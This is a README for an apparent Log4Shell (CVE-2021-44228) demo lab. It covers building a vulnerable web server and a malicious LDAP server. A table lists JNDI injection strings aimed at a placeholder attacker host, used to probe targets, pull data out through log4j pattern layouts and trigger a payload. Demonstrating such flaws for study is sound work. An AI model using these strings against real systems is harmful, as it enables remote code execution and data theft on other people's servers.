## https://sploitus.com/exploit?id=E07F3BF4-D40A-54D4-91F2-89A8DA7608C2
# Odysseus
A demo of the Log4Shell ([CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)) vulnerability.
## Build Instructions
The vulnerable webserver and malicious LDAP server were both built and tested on JDK 1.8.0_181.
### Good Guys Web Server
1. Inside `goodguys`, run `gradlew bootJar`
2. Run vulnerable webserver using `java -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar`
### Bad Guys LDAP/Web Server
1. Inside `badguys`, run `mvn package`
2. Run evil server using `java -jar .\target\evil-server.jar`
> Note: Windows defender may quietly move `target\classes\Exploit.class` to quarantine.
## Evil Payload
The malicious commands are defined inside [Exploit.java](/badguys/src/main/java/Exploit.java#L18).
## Injection Trigger
| Input | Remarks |
| ------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------- |
| `${jndi:ldap://evil-server-hostname:389/Recon}` | Checks if the target is vulnerable by listening to a connection request to the LDAP server. |
| `${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)]` | Append any valid log4j pattern latyouts to collect the data from target and display in attacker terminal. |
| `${jndi:ldap://evil-server-hostname:389/Exploit}` | Run the payload. |
## References
https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/
https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/